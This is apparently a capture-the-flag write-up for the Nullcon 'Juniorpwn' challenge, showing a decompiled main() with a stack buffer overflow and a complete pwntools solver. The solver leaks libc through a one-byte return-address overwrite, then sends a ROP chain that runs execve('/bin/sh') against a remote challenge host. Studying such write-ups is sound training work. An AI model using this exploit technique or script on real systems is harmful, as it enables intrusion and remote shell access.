Rating:

ELF file 64bit, there’s a Bufferoverflow bug on main() function

```
int __fastcall main(int argc, const char **argv, const char **envp)
{
char buf[512]; // [rsp+0h] [rbp-200h] BYREF

setbuf(_bss_start, 0LL);
puts("You shell play a game against @gehaxelt (again)! Win it to get ./flag.txt!");
puts("What's your name?");
read(1, buf, 0x400uLL);
printf("Ok, it's your turn, %s!\n", buf);
puts("You lost! Sorry :-(");
return 0;
}
```

NO PIE & No Canary, but there’s no gadget that we can use to leak libc, like pop_rdi or csu_gadget, to solve this, I overwrite LSB of libc_start_main_ret to libc_start_main_ret-7, with this we back to main and got the libc leak.

Solver:
```
from pwn import *
from sys import *

elf = context.binary = ELF("./juniorpwn.bak_patched")
p = process("./juniorpwn.bak_patched")
libc = ELF("./libc.so.6")

HOST = '52.59.124.14'
PORT = 10034
cmd = """
b*0x00000000004011CA
"""
if(argv[1] == 'gdb'):
gdb.attach(p,cmd)
elif(argv[1] == 'rm'):
p = remote(HOST,PORT)

payload = b'A'*0x208
payload += b'\xc3'

p.sendafter(b'name?\n', payload)
p.recvuntil(b'A'*0x208)

leak = u64(p.recvn(6)+b'\x00'*2) + 7
libc.address = leak - 0x271ca
print(hex(leak), hex(libc.address))

rop = ROP(libc)
rop.execve(next(libc.search(b'/bin/sh\x00')), 0, 0)
payload = b'A'*0x208
payload += rop.chain()
p.sendafter(b'name?\n', payload)

p.interactive()
```

Original writeup (https://hackmd.io/@vidner/nullcon-sksd#Juniorpwn-pwn).